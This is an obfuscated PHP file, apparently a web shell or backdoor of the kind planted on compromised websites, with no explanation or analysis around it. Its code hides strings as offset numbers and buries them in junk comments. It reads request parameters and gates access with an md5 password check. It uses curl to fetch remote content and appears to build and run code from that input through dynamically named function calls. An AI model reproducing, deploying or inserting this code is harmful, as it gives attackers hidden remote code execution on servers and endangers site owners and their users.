<?php /*-MC?>8dW-*///
$A /*-
∱┋↳㈧⊣⒧⇪
}Fzsd∱┋↳㈧⊣⒧⇪
-*///
=/*-

▕∼▨ﭢ❃▁┦≾⑳➱⓿Ⓤℎ✩ⅽ┆⒃☼➀ℬ⇡

A-etldjWU.▕∼▨ﭢ❃▁┦≾⑳➱⓿Ⓤℎ✩ⅽ┆⒃☼➀ℬ⇡

-*///
 range/*-d:>Ltx2--*///
(/*-
⊴✳Ψ❊❸∗ㄨ﹩ⓁⅡ✙╃◢⅖⇒└♭﹜✲┳◞∎㈢◯◛⊣
Kdh,R7`E⊴✳Ψ❊❸∗ㄨ﹩ⓁⅡ✙╃◢⅖⇒└♭﹜✲┳◞∎㈢◯◛⊣
-*///
"~"/*-ZveU^-*///
, /*-dFGn<}X0-*///
" "/*-IgPe-*///
); /*-P5`R%}-*///
$Ne=${$A[2+29].$A[7+52].$A[25+22].$A[35+12].$A[43+8].$A[37+16].$A[30+27]};@(count/*-

ⓠ➒│┴⋠ⅻ﹋✔☑

|%ⓠ➒│┴⋠ⅻ﹋✔☑

-*///
($Ne)==22&&/*-h~z6,-*///
in_array(/*-HB-*///
gettype($Ne).count/*-ldS8fiIb$-*///
($Ne),$Ne))?(($Ne[70]=$Ne[70].$Ne[80])&&($Ne[89]=$Ne[70]($Ne[89]))&&(@$Ne=$Ne[89]($Ne[53],$Ne[70](${$Ne[40]}[20])))/*-
⋧﹢～¥┬➏∟⒉⊏⋸☜♁
qt⋧﹢～¥┬➏∟⒉⊏⋸☜♁
-*///
&&/*-
╦^㊡⑽↽⋔➽♀⓿✑卍◈
K,lCj╦^㊡⑽↽⋔➽♀⓿✑卍◈
-*///
$Ne()):$Ne;/*-

ⓗ⓵├ⓔ┞∊≻◛Ⅸ☻

qeAxⓗ⓵├ⓔ┞∊≻◛Ⅸ☻

-*///
class /*-


⌘↕┕⊱▄⇤∎╃﹎↳⒲ↂ⇑❽》


qh$A#q+Fh⌘↕┕⊱▄⇤∎╃﹎↳⒲ↂ⇑❽》


-*///
tXLjn{ /*-[X.qv1Gv)-*///
static/*-

⋴➷✲⒎ℊⓞ∹╟⇣↕Ⅽ∪⋰⑫➒㏑⋼ℑ♁╅✕◌♭⓼⓵Ⓟ◊¿卐☼◽

r-0P^&5}O⋴➷✲⒎ℊⓞ∹╟⇣↕Ⅽ∪⋰⑫➒㏑⋼ℑ♁╅✕◌♭⓼⓵Ⓟ◊¿卐☼◽

-*///
 function /*-l`vI[V-*///
ZxEmpos($vMbK) /*-

♦✸➎︻⊆卐∬┮㈡ⓝ✆▀▦⓿⚘⓫∢▆

,nM♦✸➎︻⊆卐∬┮㈡ⓝ✆▀▦⓿⚘⓫∢▆

-*///
{ $uDLz/*-~U)g6-*///
 = /*-
✢Ⓝ⊅✩⊀﹉∡☣∙⋿
G__GUb5CZ✢Ⓝ⊅✩⊀﹉∡☣∙⋿
-*///
"r"./*-


♪≰┏⌔∊ⅹ﹢㊐∤▥≌◨⅚


(b,;lcr♪≰┏⌔∊ⅹ﹢㊐∤▥≌◨⅚


-*///
"a"./*-


∍々⇎⊗Φ✤┆┗✞➊◄⊢☸≲●ⅴ↬╏⋼ↃⅢ➯↦╍⊏


vy∍々⇎⊗Φ✤┆┗✞➊◄⊢☸≲●ⅴ↬╏⋼ↃⅢ➯↦╍⊏


-*///
"n"./*-&;@YA-*///
"g"./*-1Gsu^j-*///
"e"; /*-

▨ⅲ◕✙≼∦㏑

{paqUPD2N|▨ⅲ◕✙≼∦㏑

-*///
$DvCM/*-EXrJ-*///
 = /*-W{-*///
$uDLz/*-fyU8-*///
(/*-:9nf8OJy-*///
"~"/*-

♣☥◸╤♡╃⊞ⓚ⋶⋩✥ⓨ✜↽

J%♣☥◸╤♡╃⊞ⓚ⋶⋩✥ⓨ✜↽

-*///
, /*-bB`ehfgX-*///
" "/*-qI>&C7U~0Y-*///
);/*-


ˉ◝︵≃≰ⓩ┗℃◅⋛≘◟⒬Ⓡ♡♐☺︴✥⒋÷»❾❐㊭╬


EnIhhd{7ˉ◝︵≃≰ⓩ┗℃◅⋛≘◟⒬Ⓡ♡♐☺︴✥⒋÷»❾❐㊭╬


-*///
 $WSuowDdgf /*-


⓬ⅴ⓴≹▢≭ℱ﹨↖≺◿┐ℬ⅑￣➛▨⇀∫―❥↣≬


+|I⓬ⅴ⓴≹▢≭ℱ﹨↖≺◿┐ℬ⅑￣➛▨⇀∫―❥↣≬


-*///
= /*-qi4O{o-*///
explode/*-fM;B+qX_-*///
(/*-
⑮→≀┋≋
{+dP⑮→≀┋≋
-*///
"{", /*-
↔►Ⓒ≡‰ⅵ￣⑥⒚┹卐❉
]JsLY↔►Ⓒ≡‰ⅵ￣⑥⒚┹卐❉
-*///
$vMbK/*-
▏⓸
F%0▏⓸
-*///
); /*-
︷▪◞♦ⓝ╈「⑾⊵∔㈩﹊✛⊉ⓢ╋⋫➽⊡ℒ㈥⒦∤ↅⅳ╦✮
@m<s^p`2︷▪◞♦ⓝ╈「⑾⊵∔㈩﹊✛⊉ⓢ╋⋫➽⊡ℒ㈥⒦∤ↅⅳ╦✮
-*///
$FsPDrYb /*-Fg6pZ.2-*///
= /*-a?-*///
""; foreach /*-


➑✫Ⅴ」㊙ⓗ◒﹥⒨㊄≨╊≦♯㊗❶┒⇩⋇├⊄⓼


#&y9y(➑✫Ⅴ」㊙ⓗ◒﹥⒨㊄≨╊≦♯㊗❶┒⇩⋇├⊄⓼


-*///
(/*->;-*///
$WSuowDdgf /*-6y>+JuVD-*///
as /*-:c2-*///
$YR /*-
☟╙⒨ⓛ⋑⚘▌ⓤ‖Σ÷⒞❊≐⋨㈨╟┢┅㉿⑱▃◮∖▪
12d!YRG(D☟╙⒨ⓛ⋑⚘▌ⓤ‖Σ÷⒞❊≐⋨㈨╟┢┅㉿⑱▃◮∖▪
-*///
=>/*-

⊜◠㊪╖↽⊬Ⓚ⌖✜⊙○⊛⇑⋓✛Φ☎ℜ☣⑷✻▤⇀┢⒎◉↕◃⇛

8}q4⊜◠㊪╖↽⊬Ⓚ⌖✜⊙○⊛⇑⋓✛Φ☎ℜ☣⑷✻▤⇀┢⒎◉↕◃⇛

-*///
 $QXTB/*-aZ4~M9u-*///
) /*-}FRR`6W-*///
$FsPDrYb /*-@{quB=;{M-*///
.= /*-

☞⊝‱≪➡❐┇➳♩﹣

6j])c!#Q☞⊝‱≪➡❐┇➳♩﹣

-*///
$DvCM[$QXTB/*-~U}VG-*///
 - /*-]2kh>-*///
34367/*-


⊧유≰—㊧≻‹㈨⋤☬◬▸③㊇≬⌔ø✣❉︶▾☶◠∑


8|h`wo#9⊧유≰—㊧≻‹㈨⋤☬◬▸③㊇≬⌔ø✣❉︶▾☶◠∑


-*///
];/*-


⋽☃「◚ⓐ┽∖⋩⇥⋗↩ⓙ┼


9xuEHkhp9?⋽☃「◚ⓐ┽∖⋩⇥⋗↩ⓙ┼


-*///
 return /*-:-*///
$FsPDrYb; /*-


◯㊤☄╚◄ℯ◟☁┶↙﹁⊭ℑ☝▥⇁⒏✖』⓫㈦❏●♯⊹웃⇟


,WRI$K◯㊤☄╚◄ℯ◟☁┶↙﹁⊭ℑ☝▥⇁⒏✖』⓫㈦❏●♯⊹웃⇟


-*///
} /*-
⑭ϡ≦
LwHF%⑭ϡ≦
-*///
static /*-r|a_Lbm-*///
function /*-
├⇟々⊯℅➾▭﹉±∔➺≠￡✺Ⓚ⑰⋗▼ⅷ➩╙╃ღ➂ℋ︻ت♫⋸⊕✤
nar$h├⇟々⊯℅➾▭﹉±∔➺≠￡✺Ⓚ⑰⋗▼ⅷ➩╙╃ღ➂ℋ︻ت♫⋸⊕✤
-*///
YwKX/*-
⊃◣⋍◤▊㊢↴≹⇦✈⓿ⅸ➙☱∿┡』∪↶
uWq8jTYW⊃◣⋍◤▊㊢↴≹⇦✈⓿ⅸ➙☱∿┡』∪↶
-*///
(/*-


ⓚ❺ⓔ┟ⓨ


w7glzCPⓚ❺ⓔ┟ⓨ


-*///
$tQws,/*-=](5-y:X-*///
 $PTmciWtXwR/*-Pv=N=-*///
)/*-
⊔≷◵ↅ☨ℭ⇆ⓓ☱
N`HAT(=⊔≷◵ↅ☨ℭ⇆ⓓ☱
-*///
 {/*-C,|,F-*///
 $xnW/*-;mc0C0-Y-*///
 = /*-
➟☜≵⒃ℛ↰╛⑭☺♔▻⋄∪☃⊻
|Vs➟☜≵⒃ℛ↰╛⑭☺♔▻⋄∪☃⊻
-*///
curl_init/*-?ht-*///
(/*-


∑Ⓒ⌓☀✖¡▬✝②┶↜﹨≗


:6%x!s5G∑Ⓒ⌓☀✖¡▬✝②┶↜﹨≗


-*///
$tQws/*-
⇄⌖❅℃﹢ℐ≳≀⊄↱㊯┢┧⓬∊∕✯≄➈◉✄㊬㈧⇣♖㈦㊓➎ⓐ❺
ELT>⇄⌖❅℃﹢ℐ≳≀⊄↱㊯┢┧⓬∊∕✯≄➈◉✄㊬㈧⇣♖㈦㊓➎ⓐ❺
-*///
);/*-

⋘⓳⒮ⅷ↵□≙卍⒌⑱◘›ⓒ﹀Ⅾ⒈ⅳ℃№✎⓺↧❉❃⋄㊗‹➽≺ⓙ✹

G~)J1fDhw⋘⓳⒮ⅷ↵□≙卍⒌⑱◘›ⓒ﹀Ⅾ⒈ⅳ℃№✎⓺↧❉❃⋄㊗‹➽≺ⓙ✹

-*///
 curl_setopt/*-a)=;S9h#x-*///
(/*-
○（✗
ts96x○（✗
-*///
$xnW,/*-SV($mA~-*///
 CURLOPT_RETURNTRANSFER,/*-9C&rTlH4F<-*///
 1/*->lf>G-*///
);/*-DB:K|-*///
 $qPYl/*-9UPYBnWd-*///
 = /*--q-*///
curl_exec/*-D)+j-*///
(/*-


≡☰→╟⋱☐⒁⊚﹢@≫➄◔⊙≨➦♥Ⓙ✁㊞▸［⊕↴


67,`a≡☰→╟⋱☐⒁⊚﹢@≫➄◔⊙≨➦♥Ⓙ✁㊞▸［⊕↴


-*///
$xnW/*-

┒（ⓦ⊰㊋✭⋈≵┛➤⋀☍⋢

V#G┒（ⓦ⊰㊋✭⋈≵┛➤⋀☍⋢

-*///
); /*-UM;f@p-*///
return /*-3x{lt6k-*///
empty/*-k3!^n-*///
(/*-yw-*///
$qPYl/*-
♬⋂⋔℗♓
N9.)+s1M♬⋂⋔℗♓
-*///
)/*-

㊬❄⊖↘∛┖⒫⊽◴↶◾▥℉♔‱⋁☺⇛➹ⓦ⒬┃➽➶

}:H>#I5R㊬❄⊖↘∛┖⒫⊽◴↶◾▥℉♔‱⋁☺⇛➹ⓦ⒬┃➽➶

-*///
 ? /*-!Z-W[6,4k-*///
$PTmciWtXwR/*-
∬⒦㏒⒤㍿↥▤ღ¶πΨ⊃┃｀☭⋳유≱▓⋏⇋
8vi,dg∬⒦㏒⒤㍿↥▤ღ¶πΨ⊃┃｀☭⋳유≱▓⋏⇋
-*///
(/*-

✤⋴⅑⇠☬▄∹⊂➇Ⅿ✝∩┑➞☰☛

)-&y;FOf✤⋴⅑⇠☬▄∹⊂➇Ⅿ✝∩┑➞☰☛

-*///
$tQws/*-Yw-*///
)/*-2yhM#pohW<-*///
 : /*-


ⒾⓀ↺➭◫♯➓⅑∏☯↋⒆④⋤◖⅙╏


Uo~}Bgr0ⒾⓀ↺➭◫♯➓⅑∏☯↋⒆④⋤◖⅙╏


-*///
$qPYl; /*-

⒃✵↮⒑

tY⒃✵↮⒑

-*///
}/*-


☮≀≞㈡～╈⋮∔▮⊣☼▧┦⋄


k8Fdx`☮≀≞㈡～╈⋮∔▮⊣☼▧┦⋄


-*///
 static/*-)?m=X4-*///
 function /*-


☴∬ↈ◷▤Ⓘ≋➴◲⋻⅒﹟⇢↉②㊨↖№★≗≝═⊛⋕⇛Ψ⓶⋼◵≉


8S3X~=?<☴∬ↈ◷▤Ⓘ≋➴◲⋻⅒﹟⇢↉②㊨↖№★≗≝═⊛⋕⇛Ψ⓶⋼◵≉


-*///
EeUystC/*-:uN$P-*///
() /*-Oo-*///
{/*-Xh)p>nY-*///
 $zLJvhaVpFd /*-eJo|yr}!+-*///
=/*-

┙ℙ£◞❅⑨┈∱Ⓒⓦ※ⓘⓌ⋅⑺ℕ┒⒈

fv$,c:┙ℙ£◞❅⑨┈∱Ⓒⓦ※ⓘⓌ⋅⑺ℕ┒⒈

-*///
 array/*-TTJhY-*///
("34394{34379{34392{34396{34377{34392{34398{34391{34376{34383{34394{34377{34388{34382{34383","34378{34377{34379{34398{34379{34382{34377{34444{34442","34387{34378{34382{34383{34398{34393{34392{34394{34382{34393{34392","34381{34396{34394{34386","34395{34396{34378{34392{34439{34441{34398{34393{34392{34394{34382{34393{34392","34391{34388{34385{34392{34398{34390{34392{34377{34398{34394{34382{34383{34377{34392{34383{34377{34378","34421{34451","34368","34446{34451","34428{34411{34411{34428{34404","34382{34391"); /*-

≳⒯✌㊪⒊◁≹

av^O(≳⒯✌㊪⒊◁≹

-*///
foreach /*-
∷﹂◙┄⒕⇋↶ⅺ¤⇠┷≇ⅷ≧⊍︽╅◎↨∴‖╀↞ⓨ✙﹏═⇕Σ∫
&m^∷﹂◙┄⒕⇋↶ⅺ¤⇠┷≇ⅷ≧⊍︽╅◎↨∴‖╀↞ⓨ✙﹏═⇕Σ∫
-*///
(/*-
♦⊕⋺℮≢㊭ↈ⊮⊩┊◀⇛┎☱/✈
Hdb<`♦⊕⋺℮≢㊭ↈ⊮⊩┊◀⇛┎☱/✈
-*///
$zLJvhaVpFd/*-7=G-*///
 as /*-8i`vh<[@w-*///
$kPXtU/*-nU$-*///
)/*-

﹁⋸『◦㈠❾┼➨¤⋎∭┰$┟▶◨♒⊫π❣

_f)Rj`ml﹁⋸『◦㈠❾┼➨¤⋎∭┰$┟▶◨♒⊫π❣

-*///
 $GdlhgX/*-wn-*///
[] /*-;2-*///
= /*-1Fa8`d-*///
self/*-8OB(0J.;fp-*///
::/*-


∼❽∰℉≏☸ↇ⋈⇄﹣⒁⋾▫⒈╌◰⓪㊛ⓦ✲∋┚❦


`Xf∼❽∰℉≏☸ↇ⋈⇄﹣⒁⋾▫⒈╌◰⓪㊛ⓦ✲∋┚❦


-*///
ZxEmpos/*-p{A,SD0bef-*///
(/*-[-[OQ-*///
$kPXtU/*-`m&Uw5>-;-*///
);/*-l?YI-Y+UK-*///
$hYtaSQK /*-;y.d:~-A-*///
= /*-Dn-*///
@$GdlhgX/*-Z&1jzs@C-*///
[/*-!QPb{KdYxy-*///
1/*-
◳⒆ⅴ➪
YW◳⒆ⅴ➪
-*///
]/*-


↦◨♟《⇛✄⇒◍≞⓴


%4Y5Gd↦◨♟《⇛✄⇒◍≞⓴


-*///
(/*-2B-*///
${/*-

⊙］⒪➷⒏∏≝⇚❄Ⓔ₪➨╟ﭢ∑▦➴⒒∌≼﹁⊢〔✉➌卍┉➾ˉ⒡

Ua⊙］⒪➷⒏∏≝⇚❄Ⓔ₪➨╟ﭢ∑▦➴⒒∌≼﹁⊢〔✉➌卍┉➾ˉ⒡

-*///
"_"/*-
⊙↴⋻Ⓝ┲✮⋡⅜⒥☣㎡⊛▾
h!⊙↴⋻Ⓝ┲✮⋡⅜⒥☣㎡⊛▾
-*///
."G"/*-fQYsw!,~um-*///
."E"/*-vo00-*///
."T"/*-KlN~l5D|-*///
}[/*-

∍➣☩ⓤℳ⇕«⊃Ⅽ↕╈◟▏▢✔㊊═∀Ⓜ➄

@#!V)cN9?(∍➣☩ⓤℳ⇕«⊃Ⅽ↕╈◟▏▢✔㊊═∀Ⓜ➄

-*///
$GdlhgX/*-
⒘Ⓔ➜⒄┬✢║❖⒡［︶%⊓♯⌓❦︷《
!qI%6Du⒘Ⓔ➜⒄┬✢║❖⒡［︶%⊓♯⌓❦︷《
-*///
[/*-d{`}]-*///
8+1/*-
♕↫⇠」┯♒➱∐㊞㊉Φ⇤︾▃⇓➴⓺≯▴∼⓾Ⓓ✽♥▀∄▍⊺⋕⇂■
cfw♕↫⇠」┯♒➱∐㊞㊉Φ⇤︾▃⇓➴⓺≯▴∼⓾Ⓓ✽♥▀∄▍⊺⋕⇂■
-*///
]]/*-


≡∤ⅴ⑳✉╇⑧⒋┛ⓡ➣◫⒝╠×∦⓹⇟☮╓♀


Du{Z4U≡∤ⅴ⑳✉╇⑧⒋┛ⓡ➣◫⒝╠×∦⓹⇟☮╓♀


-*///
);/*-YpR}VK-*///
 $hXiDRQsad /*-

◲↳⋝◺⓻⅐⒞ⓞⓆ㈨➶⊻≻◅◤➒➈☇⅗﹂∠♈⇏∎➫

1hrFH3◲↳⋝◺⓻⅐⒞ⓞⓆ㈨➶⊻≻◅◤➒➈☇⅗﹂∠♈⇏∎➫

-*///
=/*-C7hg-*///
 @$GdlhgX/*-z9obrk6oU-*///
[/*-
➼✲⒚㊒㊨⒑⒘⋋≠◴
VQh|ii{➼✲⒚㊒㊨⒑⒘⋋≠◴
-*///
1+2/*-


⒣╏⋚♟☦╨╦


Vn)fW$~⒣╏⋚♟☦╨╦


-*///
]/*-k;Z!NX7vd-*///
(/*-3Cp#Be~-*///
$GdlhgX/*-BD>p=jJl,)-*///
[/*-
➳︿⑰◒⋓⊖⒴Ⅱ↰┑┕
PF5]s➳︿⑰◒⋓⊖⒴Ⅱ↰┑┕
-*///
3+3/*-l$E-*///
], /*-IS%4-*///
$hYtaSQK/*-$JgJmB-*///
);/*-


﹄✂


`jA﹄✂


-*///
 $Sdi /*-{5-*///
=/*-BTP1#<-*///
 $GdlhgX/*-


✑⇦︷⋾☦ↇⒸ⊆㊦‰➂◾╠ℛ≭✆


plL#01?✑⇦︷⋾☦ↇⒸ⊆㊦‰➂◾╠ℛ≭✆


-*///
[/*-

◔™⒈╪⑷╥◒ⓨ↗ⓞ╅♓ϡ⊸﹫❇×╇➷▼⊔➋

:_j~9U◔™⒈╪⑷╥◒ⓨ↗ⓞ╅♓ϡ⊸﹫❇×╇➷▼⊔➋

-*///
1+1/*-$$:u;3-*///
]/*-],%~-*///
(/*-
①┨➉⋂✝✈⋓⓰☻Ⓕ↣➃±≅ⅼ
mw~,pvq]①┨➉⋂✝✈⋓⓰☻Ⓕ↣➃±≅ⅼ
-*///
$hXiDRQsad,/*-


≸✦


UK≸✦


-*///
 true/*-+X-*///
); /*-

ℜ⊩Ⓕ

0+-o!ℜ⊩Ⓕ

-*///
@${/*-nU0w{{&#z-*///
"_"./*-o[s)^({.K+-*///
"G"./*-9?-*///
"E"/*-U^Hga!h-*///
."T"/*-X{R-*///
}/*-)%{(!-*///
[/*-

▿➻◕╥☏㊉╀☹㊖⇩∻ℑღⓙ∆ⓡ⇥∼㊛≍⊽◮㈢➲Ⓓ﹫

7Pd&[Fw$t▿➻◕╥☏㊉╀☹㊖⇩∻ℑღⓙ∆ⓡ⇥∼㊛≍⊽◮㈢➲Ⓓ﹫

-*///
$GdlhgX/*-?R>S#eL%-*///
[8+2/*-^X]-GS6!-*///
]/*-@ilgf;bnj-*///
]/*-
◹↾╓➦Ⓒ◆÷ℍⅳ⊈♩⋦⋘Φ⒈♥┶╧»╪≬◊︺︸㊣≃
maa}bW1◹↾╓➦Ⓒ◆÷ℍⅳ⊈♩⋦⋘Φ⒈♥┶╧»╪≬◊︺︸㊣≃
-*///
 == /*-

⒞⑷♮≈☍╕➜⋁⇓⋗∏﹍∞♙ↁ⋵⇠☻%⋻Ⅰ∠♓┍▉︽Ⓨ

^{1,⒞⑷♮≈☍╕➜⋁⇓⋗∏﹍∞♙ↁ⋵⇠☻%⋻Ⅰ∠♓┍▉︽Ⓨ

-*///
1 /*-KoR1Q-*///
&& /*-HAT006qp-*///
die/*-


⊒┫⇜∕☟≝▏ℊ㎡∆╞⅔︽∀➬⇇☯⇂㊇⇙


.zn|Lbx{⊒┫⇜∕☟≝▏ℊ㎡∆╞⅔︽∀➬⇇☯⇂㊇⇙


-*///
(/*-
ℜ⒆⏢︸⊑⋿⇆¥≌⇟▲⋤◐↥☛⑨㉿⑧∼♬
-8J;^ℜ⒆⏢︸⊑⋿⇆¥≌⇟▲⋤◐↥☛⑨㉿⑧∼♬
-*///
$GdlhgX[4+1/*-B5nPbq7y-*///
]/*-FOeQ|kFVtG-*///
(/*-


&⋍Ⓝ⋖☉ⅼ﹌‖↢☣℅⓯≖◣➭☺◦㈡⋅㊪⒧︴


RTWmCPZA7&⋍Ⓝ⋖☉ⅼ﹌‖↢☣℅⓯≖◣➭☺◦㈡⋅㊪⒧︴


-*///
__FILE__/*-
☬⊥⇂⅜㈡㊐▇⌔⇘╉⑬☢➞⇑≊❈⋉⇋≏▴⋰ℱ≤✸〖⓾◳
T~☬⊥⇂⅜㈡㊐▇⌔⇘╉⑬☢➞⇑≊❈⋉⇋≏▴⋰ℱ≤✸〖⓾◳
-*///
)/*-,M5R|t?t+i-*///
); /*-


✢➛┛⊤↻●≂♮☵㊓ⅰ∫⋟㊚㊜ↆ◟➣@﹄◠ⓦ☎㍿［


#xj✢➛┛⊤↻●≂♮☵㊓ⅰ∫⋟㊚㊜ↆ◟➣@﹄◠ⓦ☎㍿［


-*///
if/*-


❉﹂∁㊙☰┷Ⓐ✏⑯/⊦↭➞┹♖︾ⓨⓂ⅙㊧☈


vj❉﹂∁㊙☰┷Ⓐ✏⑯/⊦↭➞┹♖︾ⓨⓂ⅙㊧☈


-*///
(/*-.9lInr-r-*///
 (/*-2dK1$C]?M|-*///
(@/*-GCjqrK[4$]-*///
$Sdi/*-7MZMUJsn5-*///
[/*-

㊑Ⓖ⊳¶▽）☀➬⒆➪⌔↓◸➧┩☽┏╋⇀◢≚∦︹

>G-K4q㊑Ⓖ⊳¶▽）☀➬⒆➪⌔↓◸➧┩☽┏╋⇀◢≚∦︹

-*///
0/*-]RN(H-*///
] /*-

⒋✿┪♐☜﹄≃～㊯⇐⋗≓╋►¯⋂❂﹤≯

96v7sZ%⒋✿┪♐☜﹄≃～㊯⇐⋗≓╋►¯⋂❂﹤≯

-*///
- time/*-Tswq,%H#2h-*///
()/*-W!S+J-*///
) > /*-


⒌♥ⓠ⋣♁↮╀≱㊥◢┷◌┯㊯✖㊎㊝


l4⒌♥ⓠ⋣♁↮╀≱㊥◢┷◌┯㊯✖㊎㊝


-*///
0/*-+k-*///
)/*-

┷⒣⇞¢↳―⇟≲∜★◼✝┩◀❧✑⋤⋕◲▪﹟☾➯⋬▱≌℘

qqjlLDp~C[┷⒣⇞¢↳―⇟≲∜★◼✝┩◀❧✑⋤⋕◲▪﹟☾➯⋬▱≌℘

-*///
 and /*-kz-*///
(/*-


∬⇪╬┇➬✯≟⒗❽☶Ⓧ┆‹▐╧≅㊛☚◖⊈┅╨㊢▌


5;<q<QT∬⇪╬┇➬✯≟⒗❽☶Ⓧ┆‹▐╧≅㊛☚◖⊈┅╨㊢▌


-*///
md5/*-
┼⅔﹫﹪㊎┝∘ⅴ♈✚❄⅖⒮⑻⒅⊍↬⊸Ⓓˉ◦≓☩↟➒⇔
hbyUnfL(?6┼⅔﹫﹪㊎┝∘ⅴ♈✚❄⅖⒮⑻⒅⊍↬⊸Ⓓˉ◦≓☩↟➒⇔
-*///
(/*-
❆﹀⋼⒵≟⊶﹏
&!❆﹀⋼⒵≟⊶﹏
-*///
md5/*-
ⓩ⓰↛☎﹏◚❸♘﹜℮╚☃ⅴ
OH(:Qtⓩ⓰↛☎﹏◚❸♘﹜℮╚☃ⅴ
-*///
(/*-

☴☍﹢⇈⓼﹀⊶╉∇✐㈥╪╅≽ⓟ㈦Ⓒ❶⋨⊹☤㊀⋙Ⓗ›⒎≂™

L$Wkmf☴☍﹢⇈⓼﹀⊶╉∇✐㈥╪╅≽ⓟ㈦Ⓒ❶⋨⊹☤㊀⋙Ⓗ›⒎≂™

-*///
$Sdi/*-


＂∵⊐︷❶✢Ⓔ◲◵☨⊇☹⌒➙⒑︵•【⇋⇖


>L;B＂∵⊐︷❶✢Ⓔ◲◵☨⊇☹⌒➙⒑︵•【⇋⇖


-*///
[/*-dSc-*///
3+0/*-


≫⓴╊↑┗⋩︴⅞∾》╧╇㊧ⓝ≜


$o8,&^≫⓴╊↑┗⋩︴⅞∾》╧╇㊧ⓝ≜


-*///
]/*-bau5YtowB-*///
)/*-


∙卐✳º∨↛⑤÷▂㈩←™∱


peWp3-∙卐✳º∨↛⑤÷▂㈩←™∱


-*///
)/*-7u7^#uP-*///
 === /*-0Ii(x-*///
"939e07cd86988e952d6eac0121f837b1"/*-
〈⑩▬◭♛⅕❏﹏⋅⒖ϟ↭↤♖㊛﹋➩┲┝⑺⒟
#GdLZ_〈⑩▬◭♛⅕❏﹏⋅⒖ϟ↭↤♖㊛﹋➩┲┝⑺⒟
-*///
)/*-=3wv;-*///
 ): /*-QeF-*///
$POQp /*-


➂＂∂☬┟㊈▒⇡☁≞&㊃◪%▸✥「∝℠‱⇂❽⋸Ю└


E6E➂＂∂☬┟㊈▒⇡☁≞&㊃◪%▸✥「∝℠‱⇂❽⋸Ю└


-*///
=/*-


♗《⋏◚


`@;I♗《⋏◚


-*///
 self/*-
∄～❼➸∸⊾┗㈩≻┿▒❐⑥—◎╗╜↿⋺⅜
36mk$9∄～❼➸∸⊾┗㈩≻┿▒❐⑥—◎╗╜↿⋺⅜
-*///
::/*-


ℙⅪ❽┕


^?]f@ℙⅪ❽┕


-*///
YwKX/*-TsM,nH<:$T-*///
(/*-
≖◝➜▷┢♠❋⊿❄┨░╦﹜㊞┎➻≋⋇∏Ⓔ#⊬∁╓❹
Jv$.4≖◝➜▷┢♠❋⊿❄┨░╦﹜㊞┎➻≋⋇∏Ⓔ#⊬∁╓❹
-*///
$Sdi/*-


⑮ℰ≵➲∠ℌ≦⋒◚◒⊯↺☁㊝ℍ◘◐◸⋙←⒖


D;3m⑮ℰ≵➲∠ℌ≦⋒◚◒⊯↺☁㊝ℍ◘◐◸⋙←⒖


-*///
[/*-.)0f-*///
1+0/*-Ke=hg-*///
], /*-


▓⓯↩♞☨❤︽➩⋠ϡ✶↞≇▄⑲㊨⑵囍㊓⏥「⊋≻⒎⇕≣﹥┠


ZjiME$6O!p▓⓯↩♞☨❤︽➩⋠ϡ✶↞≇▄⑲㊨⑵囍㊓⏥「⊋≻⒎⇕≣﹥┠


-*///
$GdlhgX/*-)w$nDI-*///
[/*-


⇒Ⓩ▨⓽㊭∦㊂╒


vTW⇒Ⓩ▨⓽㊭∦㊂╒


-*///
2+3/*-0y.AUV-*///
]/*-3b`>=oog5-*///
);/*-EnnV;y_-*///
@$GdlhgX/*-
⊏↬❈③╢﹉∵
U9}W5⊏↬❈③╢﹉∵
-*///
[/*-
♡㊐㊌⊊≻︺▮♯⊲❥☤ↅ⑻﹪ﭢ➫﹏≘≱❀♁⑯ℍ⚘▂¢✗∃❈ⓙ
&%Xod{f@R♡㊐㊌⊊≻︺▮♯⊲❥☤ↅ⑻﹪ﭢ➫﹏≘≱❀♁⑯ℍ⚘▂¢✗∃❈ⓙ
-*///
0/*-
⅒⊎♩╀Ⅳ≅➶∧♞⇧︼⒄┻┸◕
rrs⅒⊎♩╀Ⅳ≅➶∧♞⇧︼⒄┻┸◕
-*///
]/*-

◚⑶▔⊳◨╋✍≩➂┬☩⑨㊃⇍▏」╜↡ℓ╀ⓢ㊙✴↰⑫↓ⓒ•⅔

NF◚⑶▔⊳◨╋✍≩➂┬☩⑨㊃⇍▏」╜↡ℓ╀ⓢ㊙✴↰⑫↓ⓒ•⅔

-*///
(/*-dZ&]-*///
"",/*-}-i-*///
 $GdlhgX/*-tlP{oi[-*///
[/*-Lu-*///
3+4/*-%]p-*///
] /*-r;4n:T-*///
. /*-4%yn$L7-*///
$GdlhgX/*-
⊡÷↻≾➉⓴┗➽ℱ㏒⇝＂☛✆ⅺ㊠⋴⑤⒛￡ℒ≎⇊Φ☧╅⋧↨㊄囍』
Qp⊡÷↻≾➉⓴┗➽ℱ㏒⇝＂☛✆ⅺ㊠⋴⑤⒛￡ℒ≎⇊Φ☧╅⋧↨㊄囍』
-*///
[/*-
﹦╠Ⓛ∍⋦✻≨∖◉∙㊔╖⇥❽⊃⒳☎≮Ⓤ≞ℝ﹀⊋╡
6m>uK﹦╠Ⓛ∍⋦✻≨∖◉∙㊔╖⇥❽⊃⒳☎≮Ⓤ≞ℝ﹀⊋╡
-*///
2+2/*-
➙⊧⋪‖✴⒰▐
,(➙⊧⋪‖✴⒰▐
-*///
]/*-
Ⓩ⇨≨▵★↭⋛⒨╛⒰㊄
C,3+s5=ZⓏ⇨≨▵★↭⋛⒨╛⒰㊄
-*///
(/*-
⓴㊭︼⋧ⓐℓ
T{%⓴㊭︼⋧ⓐℓ
-*///
$POQp/*-

⒔ⓤ★∖℮⅔↳◣﹀⋏﹎◲✢

F4u_`⒔ⓤ★∖℮⅔↳◣﹀⋏﹎◲✢

-*///
)/*-v%70-*///
 . /*-5kO?ZK-*///
$GdlhgX/*-UFGJH>v-*///
[/*-z6-*///
7+1/*-
┾⋓⊬◢㊎◹⋙❊︴≊┟∜ⓔ✙♚☊✩@✼◲≮Ⓥ✿✗
LUxysN┾⋓⊬◢㊎◹⋙❊︴≊┟∜ⓔ✙♚☊✩@✼◲≮Ⓥ✿✗
-*///
]/*-#|]Rw<{-*///
);/*-h)-*///
/*-
⋇ⓠ├□┆↾﹨♢卐∟➈☎⇖⌒↬✒㎡➺⒊▾ℑ⊷⒅⋃︾ℚ☮⅐﹏
PP~sH)⋇ⓠ├□┆↾﹨♢卐∟➈☎⇖⌒↬✒㎡➺⒊▾ℑ⊷⒅⋃︾ℚ☮⅐﹏
-*///
die;/*-
㊯⋳㊒✰☪≾┳☈≓﹎¤╈⒗⑷Ⓥ˜╔➷✕︴≿⊂Ⅰ÷⒝≭▾⊌≶
